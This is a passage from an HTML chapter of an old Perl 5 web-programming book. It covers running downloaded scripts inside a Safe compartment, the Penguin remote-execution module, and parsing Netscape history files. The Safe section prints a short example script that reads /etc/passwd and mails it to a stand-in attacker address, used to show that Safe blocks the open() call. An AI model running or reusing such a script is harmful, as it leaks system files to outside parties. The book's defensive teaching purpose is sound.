ch15.htm

Web_Programming_with_Perl5,一个不错的Perl语言教程。

	<LI>Open and parse an optional .helper.privs file to give the user some flexibility

	in configuring the Safe compartment. Be very careful about using this option. Make

	quite sure you understand exactly what you're permitting before you make an entry

	in this file.

	<P>

	<LI>Share the <TT>STDIN</TT> and <TT>STDOUT</TT> file handles, and the <TT>%ENV</TT>

	hash into the safe compartment.

	<P>

	<LI>Execute the downloaded script, within the safe compartment, using the <TT>Safe::rdo()</TT>

	method.

	<P>

	<LI>Check <TT>$@</TT> for any runtime errors during the execution.

</OL>



<P>Using this technique is certainly preferable to nothing at all, but it still isn't

foolproof. If the user incorrectly configures his or her .helper.privs file to allow

an unsafe op like <TT>fork()</TT> or <TT>open()</TT>, it can lead to trouble. Make

sure that you, and/or the user, fully understand how Safe works and the implications

of each opcode before configuring any additional <TT>permit()</TT>'d operations.</P>

<P>If the script that gets executed on the client side has any given operation that

has not been <TT>permit()</TT>'d, the script will terminate with an error. Suppose

that, for instance, someone sent you a script that tried to open and mail your passwd

file:</P>

<PRE><FONT COLOR="#0066FF">open(PASSWD,&quot;&lt;/etc/passwd&quot;);

open(MAIL,&quot;|/usr/lib/sendmail -t&quot;);

print MAIL &quot;To: darkman\@badguys.org\n&quot;;

print MAIL &quot;Subject: Hey darkman!  Got another one!\n&quot;;

print MAIL &quot;From: LoserUser\@bozosRus.com\n\n&quot;;



while(&lt;PASSWD&gt;){

   print MAIL $_;

}

close(MAIL);

exit(0);    # Another Success!

</FONT></PRE>

<P>This script would have run just fine if you hadn't set up a Safe compartment.

Since you did, though, the script won't run, and Netscape will give you back an error

dialog that looks like Figure 15.3, indicating that the <TT>open()</TT> operation

wasn't allowed. Too bad for darkman. <BR>

<BR>

<A HREF="17wpp03.jpg" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/17wpp03.jpg"><TT><B>Figure 15.3.</B></TT></A><TT> </TT>A Safe

error message.

<H3 ALIGN="CENTER"><A NAME="Heading8"></A><FONT COLOR="#000077">PenguinA New Paradigm

in Remote Execution</FONT></H3>

<P>One of the most interesting and potentially useful examples of remote Perl code

execution doesn't use the Web at all. As we've previously mentioned, it's arguable

whether the most important tasks that need to be executed on remote clients really

need a user interface at all. Administration tasks, remote processing, CPU sharing,

and other important tasks don't necessarily require spinning mazes or little fat

guys jumping around on the screen.</P>

<P>The Penguin module is a complete interface and execution environment all by itself.

We mention it here because it's designed in a way that utilizes the most important

of the features we mentioned earlier in the chapter in our list of desirable characteristics

for an embedded Perl in a Web browser.</P>

<P>The Penguin runs the code it receives in a configurable Safe environment. The

configuration of the Safe compartment is done automatically, depending on the PGP

signature of the &quot;Frame&quot; that is sent from the remote end. If it's from

someone you trust, more opcodes can be permitted; if not, then little or nothing,

in terms of allowable ops, is the default. It also provides a means of encryption

of the transaction via PGP. The Penguin's output is usually limited to files or text,

but in theory, it should be able to execute any given module like Tk or OpenGL if

you trust the sender enough.</P>

<P>A Penguin is simply a Perl object that, when instantiated with the <TT>new()</TT>

method, can be set up to be either a server or a client with the capability to switch

back and forth between the two, to effect a &quot;conversation&quot; between two

Penguins consisting of Perl scripts that execute on each side and return results

to the other side. The Penguin uses the handy and very stable IO module to do all

of its communication on the socket between it and the remote Penguin. Since the IO

module is now (as of 5.003_02) shipping with Perl as a core module, you'll be all

set once you get the preceding mentioned items.</P>

<P>You can obtain the Penguin module from the CPAN. You'll also need a PGP executable

and, of course, the Safe module. When you've got the required components installed,

you can try it out. To do this, you'll need to set up your own PGP keyring and write

up a little Perl script to pgp-sign and have it sent to the client. The version of

Penguin we tried was an early alpha, but we expect the 1.0 version to be released

by the time this book is published.</P>

<P>If you need a remote secure execution environment, but not necessarily within

a Web browser, give the Penguin a try. You can get it at</P>

<PRE><A HREF="javascript:if(confirm('http://www.eden.com/~fsg/penguin/  \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address.  \n\nDo you want to open it from the server?'))window.location='http://www.eden.com/%7Efsg/penguin/'" tppabs="http://www.eden.com/%7Efsg/penguin/"><FONT COLOR="#0066FF">http://www.eden.com/~fsg/penguin/</FONT></A><FONT

COLOR="#0066FF">

</FONT></PRE>

<P>According to its author, the Penguin is capable of the following: The combination

of these functions enable direct Perl coding of algorithms to handle safe Internet

commerce, mobile information-gathering agents, &quot;live content&quot; Web browser

helper apps, distributed load-balanced computation, remote software update, distance

machine administration, content-based information propagation, Internet-wide shared-data

applications, network application builders, and so on. Definitely an exciting development

in the Perl community. Check it out.

<H3 ALIGN="CENTER"><A NAME="Heading9"></A><FONT COLOR="#000077">Parsing Netscape

History Files</FONT></H3>

<P>We're going to close this chapter with a few tips for handling the various database

files Netscape uses to store its global history and other important records.</P>

<P>Beginning with version 2.0, Netscape is using the Berkeley DB package to produce

its databases that it accesses at runtime for various lookups. In order to run the

sample code that follows, you'll need to build and install the DB library and its

associated include files. You can get these from the CPAN in the <TT>misc</TT> directory.

You'll also need to build and install the DB_File module, which ships as a core Perl

module. You have to either remake Perl or build the module outside of the Perl distribution

after you've installed the DB library and include files.</P>

<P>Tom Christiansen, that old wizard, took the time to figure out how the Netscape

global history file was put together and wrote up a nice little tool to operate on

it; the tool is called ggh, for Grok Global History. You can get the ggh tool from

the CPAN in Tom's authors directory:</P>

<PRE><FONT COLOR="#0066FF">~/authors/Tom_Christiansen/scripts/nshist.gz

</FONT></PRE>

<P>Let's take a look at how it works. Tom's stuff is usually an exercise in proper

Perl coding style.</P>

<P>ggh has several command-line invocation options that allow the user to invoke

it to grep out the URLs of interest, using Perl regular expressions from the history

file as well as convert time formats.</P>

<P>If there's a link that you can't quite remember the location of, but you may remember

the basename of the site, you can use ggh to search your entire history file to find

anything that matches the basename. For instance, suppose that I wanted to find all

the sites relative to Perl in my global history. I'd just use the simple invocation

with the Perl regexp:</P>

<PRE><FONT COLOR="#0066FF">% ggh Perl

</FONT></PRE>

<P>This gives me the following output from my history file at work:</P>

<PRE><FONT COLOR="#0066FF">Sat Sep 14 14:16:11 1996 http://moulon.inra.fr:80/oracle/www_oraPerl_eng.html

Sat Sep 14 14:19:29 1996 http://cs.indiana.edu/Perl-server/intro.html

Sat Sep 14 14:19:30 1996 http://www.cs.indiana.edu/Perl-server/intro.html

Sat Sep 14 14:19:31 1996 http://www.cs.indiana.edu/picons/db/news/comp/lang/Perl/

&#194;unknown/face.xbm

Wed Aug 28 18:11:00 1996 http://ducks.corp.adobe.com/Perl/authors/

Wed Sep 18 00:55:54 1996 http://www.Perl.com/CPAN/src/latest.tar.gz

Wed Sep 18 00:55:59 1996 ftp://ftp.digital.com/pub/plan/Perl/CPAN/src/latest.tar.

&#194;gz

Wed Sep 18 00:56:11 1996 http://www.Perl.com

Wed Sep 18 00:56:50 1996 http://www.ora.com/catalog/covers/pPerl2.t.gif

Wed Sep 18 00:58:19 1996 http://www.ee.pdx.edu/~rseymour/Perl/

Wed Sep 18 00:58:26 1996 http://www.eecs.nwu.edu/Perl/Perl.html

Wed Sep 18 00:59:17 1996 http://www.middlebury.edu/~otisg/images/button.Perl.gif

Wed Sep 18 00:59:33 1996 http://www.cis.ohio-state.edu/htbin/info/info/Perl.info

Wed Sep 18 01:00:08 1996 http://www.ics.uci.edu/pub/websoft/libwww-Perl/

Wed Sep 18 01:00:29 1996 http://www.wg.omron.co.jp/~jfriedl/Perl/index.html

Wed Sep 18 01:00:45 1996 http://www.hut.fi/~jhi/Perl5-porters.html

Wed Sep 18 01:01:17 1996 http://homepage.seas.upenn.edu/~mengwong/Perlhtml.html

Wed Sep 18 01:01:45 1996 http://www.khoros.unm.edu/staff/neilb/Perl/www.html

</FONT></PRE>

<P>After you try Tom's ggh script for a while, you can modify it, for instance, to

use the CGI libraries and automate the process of keeping it up to date with working

URLs. As with many of Tom's scripts, it's completely free, and you can hack at will.

Just don't redistribute without making a note of your changes.



<DL>

	<DT></DT>

</DL>



<H3 ALIGN="CENTER">

<HR WIDTH="85%">

<BR>

<FONT COLOR="#000077">NOTE:</FONT></H3>





<BLOCKQUOTE>

	<P>A bytecode compiler for Perl is currently in development and is targeted for release

	with the 5.005 version of Perl.<BR>

	

<HR>





</BLOCKQUOTE>



<H3 ALIGN="CENTER"><A NAME="Heading11"></A><FONT COLOR="#000077">Summary</FONT></H3>

<P>In general, excuting any application (including Java) on the client side is a

dangerous thing to do. In this chapter, I've tried to cover some relatively safe

and appealing ways to use Perl in this context. As always, caveat scriptor. Watch

the newsgroup <TT>comp.lang.perl.misc</TT> to keep up with the latest developments

regarding Netscape/Perl.<BR>



<P ALIGN="CENTER"><A HREF="ch14.htm" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/ch14.htm"><IMG SRC="blanprev.gif" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/blanprev.gif" WIDTH="37" HEIGHT="37"

ALIGN="BOTTOM" BORDER="2"></A><A HREF="index-1.htm" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/index-1.htm"><IMG SRC="blantoc.gif" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/blantoc.gif" WIDTH="42"

HEIGHT="37" ALIGN="BOTTOM" BORDER="2"></A><A HREF="ch16.htm" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/ch16.htm"><IMG SRC="blannext.gif" tppabs="http://210.32.137.15/ebook/Web%20Programming%20with%20Perl%205/blannext.gif"

WIDTH="45" HEIGHT="37" ALIGN="BOTTOM" BORDER="2"></A>





</BODY>



</HTML>